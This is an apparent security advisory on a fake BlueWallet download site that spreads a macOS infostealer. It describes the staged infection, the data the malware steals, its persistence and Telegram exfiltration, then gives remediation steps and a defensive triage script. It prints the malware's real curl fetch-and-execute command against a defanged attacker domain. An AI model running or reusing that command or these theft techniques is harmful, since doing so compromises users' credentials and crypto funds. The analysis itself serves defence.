Fake BlueWallet Scam Targets Mac Users' Crypto Assets

A sophisticated social engineering campaign is currently targeting macOS users through a fake website impersonating BlueWallet, the legitimate Bitcoin wallet. The scam tricks users into downloading and executing malicious software designed to compromise sensitive data and cryptocurrency assets. BlueWallet itself remains uncompromised, with attackers simply leveraging its trusted brand for their attack.

How the Attack Works

Cybercriminals have created a convincing fake download page at update-bluewallet[.]com that mimics the official BlueWallet website. Rather than exploiting technical vulnerabilities in macOS, the attack relies on convincing users to bypass security controls themselves.

When a victim visits the fake site, a file named BlueWallet Installer.applescript automatically downloads. The website then presents seemingly legitimate setup instructions, directing users to open the script in macOS’s built-in Script Editor and press the Play button or use the keyboard shortcut ⌘R.

This approach is deliberately clever. By having users manually run the code through a trusted Apple tool, the malware sidesteps macOS’s notarization and quarantine checks that typically block unsigned applications. The user becomes a willing participant in their own compromise.

The Multi-Stage Payload

The AppleScript that runs initially is quite simple. It executes a base64-encoded shell command that fetches a secondary script from projects2026box[.]com.

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

This second-stage payload, named .sysupd.sh, operates stealthily by hiding in the /tmp directory with restricted file permissions readable only by the compromised user. Configuration details including Telegram bot tokens and command-and-control identifiers are weakly obfuscated using an XOR cipher. The malware also contains plain-text Bitcoin, Ethereum, and Solana wallet addresses used for clipboard hijacking.

What Gets Stolen

Once active, the malware initiates a broad sweep of sensitive data across multiple categories. Its reach is extensive and systematic.

Browser data: The malware extracts history, cookies, login credentials, and bookmarks from Chromium-based browsers like Chrome, Brave, and Edge, as well as Firefox-based browsers. It also targets macOS native Safari data including cookies, history, and saved form values.

Cryptocurrency wallets: Desktop wallet applications including Electrum, Exodus, Atomic Wallet, Ledger Live, and Trezor Suite are targeted. Browser-extension wallets across Bitcoin, Solana, EVM, and Cosmos ecosystems are also compromised, including MetaMask, Phantom, and Keplr.

Security credentials: The malware steals data from password managers like LastPass, 1Password, Dashlane, and Bitwarden, along with 2FA and authenticator tools such as Google Authenticator and Authy.

Communication apps: Session data and local storage from Telegram Desktop and Discord are copied.

Developer and cloud tools: The malware searches for AWS CLI configurations, SSH keys, GnuPG keys, Kubernetes configs, and Git files containing credentials.

General files: The malware copies the local Apple Notes database and scans for specific file types including .txt, .pdf, .docx, .wallet, .key, and .seed files in common user directories.

Persistence and Control

Beyond the initial data theft, the malware establishes persistence by writing a LaunchAgent plist file into ~/Library/LaunchAgents, ensuring it runs automatically at every login.

The most dangerous feature is its live clipboard hijacking loop, which continuously monitors for cryptocurrency wallet addresses. When a user copies a wallet address, the malware silently replaces it with an attacker-controlled address. This means funds sent by the victim go directly to the attacker instead of the intended destination.

The malware also attempts to capture the user’s macOS account password through a fake System Preferences dialog. For data exfiltration, it uses macOS’s native ditto command to archive stolen information and splits files into 49 MB chunks to comply with Telegram’s upload limits.

Finally, the malware supports interactive control via a Telegram bot, allowing attackers to execute arbitrary shell commands, download specific files from the victim’s machine, and even trigger a self-destruct sequence.

If You’re Compromised

If you suspect your Mac has been infected with this malware, immediate action is critical. Time is essential when protecting your cryptocurrency and sensitive data.

  1. Disconnect the compromised machine from the network immediately to sever the command-and-control connection.
  2. Run a full scan using up-to-date security software with web protection enabled. Malwarebytes Premium can help, or start with a free virus scan.
  3. From a different trusted device, change passwords for all accounts used on the compromised Mac. Prioritize email and cryptocurrency exchange accounts.
  4. Move any cryptocurrency to a new wallet created on a clean device. Treat all existing seed phrases and private keys as compromised.
  5. Before sending crypto in the future, verify the full destination address character by character.
  6. Check ~/Library/LaunchAgents for unfamiliar files and look for the hidden .sysupd.sh file in /tmp.
  7. Rotate cloud and SSH credentials if files like .ssh, .aws, or .gnupg were on the machine.
  8. If uncertain about the extent of the compromise, back up your data and reinstall macOS from a trusted source rather than attempting manual cleanup.
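One way to carry out step 6 (and to spot the LaunchAgent persistence described above) is the triage helper below. It is an added example, not code from the original article or from BlueWallet; it assumes XML-format plists and takes the directories as parameters so it can be pointed at a mounted image or a test folder.

```shell
#!/bin/sh
# Added triage helper, not part of the original article or of BlueWallet.
# Checks the two locations the write-up names: LaunchAgents plists that
# launch a program out of /tmp or a dot-prefixed (hidden) file, and the
# /tmp/.sysupd.sh second-stage script itself. Assumes XML plists; convert
# binary ones first with: plutil -convert xml1 -o - FILE

# Print every plist in DIR whose <string> values contain a path under
# /tmp, /var/tmp or /private/tmp, or a path whose basename starts with a dot.
# Returns 1 if any plist was flagged, 0 otherwise.
scan_launchagents() {
    dir="$1"
    flagged=0
    for plist in "$dir"/*.plist; do
        [ -f "$plist" ] || continue
        if grep -Eq '<string>(/private)?(/var)?/tmp/[^<]*</string>' "$plist" \
           || grep -Eq '<string>[^<]*/\.[^/<]+</string>' "$plist"; then
            printf 'suspicious LaunchAgent: %s\n' "$plist"
            flagged=1
        fi
    done
    return "$flagged"
}

# Returns 1 if the hidden second-stage script exists under TMPDIR, 0 otherwise.
check_dropper() {
    if [ -e "$1/.sysupd.sh" ]; then
        printf 'second-stage script present: %s\n' "$1/.sysupd.sh"
        return 1
    fi
    return 0
}

# Stand-alone run against the live locations; status 1 means something was flagged.
status=0
scan_launchagents "${HOME:-/nonexistent}/Library/LaunchAgents" || status=1
check_dropper /tmp || status=1
if [ "$status" -eq 0 ]; then
    echo "no indicators from this campaign found"
fi
```

A hit only means the plist deserves a closer look: open it and confirm what the ProgramArguments actually launch before deleting it.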

The Real Vulnerability

This campaign reveals an important trend: as operating systems strengthen their technical security, attackers increasingly pivot to social engineering. The fake BlueWallet scam didn’t bypass Apple’s security controls. It convinced users to click through them voluntarily.

The most critical defense is human vigilance. Be deeply suspicious of any download that arrives with instructions to open it in Script Editor, a developer utility, or Terminal and press “Run.” This pattern should immediately raise red flags.

Protect your device today and encourage others to verify download sources before executing any installer scripts. In the current threat landscape, user awareness is the strongest line of defense.
